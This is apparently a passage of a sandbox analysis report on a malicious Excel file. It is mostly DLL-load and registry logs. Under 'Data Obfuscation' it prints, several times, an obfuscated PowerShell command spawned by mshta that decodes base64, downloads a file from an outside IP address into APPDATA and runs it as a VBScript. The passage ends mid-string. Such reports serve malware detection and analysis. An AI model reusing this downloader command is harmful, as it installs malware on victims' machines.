Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

PowerShell case anomaly found

Source:	Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

Source: PO#BBGR2411PO69.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAg